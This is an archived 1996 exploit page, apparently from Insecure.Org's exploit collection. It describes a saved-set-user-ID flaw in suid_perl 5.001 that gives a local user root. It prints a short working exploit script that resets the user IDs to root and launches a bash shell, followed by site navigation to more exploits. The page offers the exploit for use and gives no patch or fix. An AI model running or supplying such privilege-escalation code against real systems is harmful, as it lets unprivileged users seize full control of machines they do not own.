suid_perl 5.001 vulnerability

Summary

Description:	On systems that support saved set-user-IDs, perl isn't thorough enough in giving up its root priviledges.
Author:	Jon Lewis (jlewis@inorganic5.fdt.net) wrote this basic exploit, though it has been modified. It is unclear who found the hole.
Compromise:	root (local)
Vulnerable Systems:	Systems that support saved set-user-IDs and set-group-IDs and have suid_perl 5.001 (and possibly below) installed. Many linux and *BSD boxes.
Date:	June 1996

Details

Exploit:

#!/usr/bin/suidperl -U
$ENV{PATH}="/bin:/usr/bin";
$>=0;$<=0;
exec("/bin/bash");

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:

All OS's	Linux	Solaris/SunOS	Micro$oft
*BSD	Macintosh	AIX	IRIX
ULTRIX/Digital UNIX	HP/UX	SCO	Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: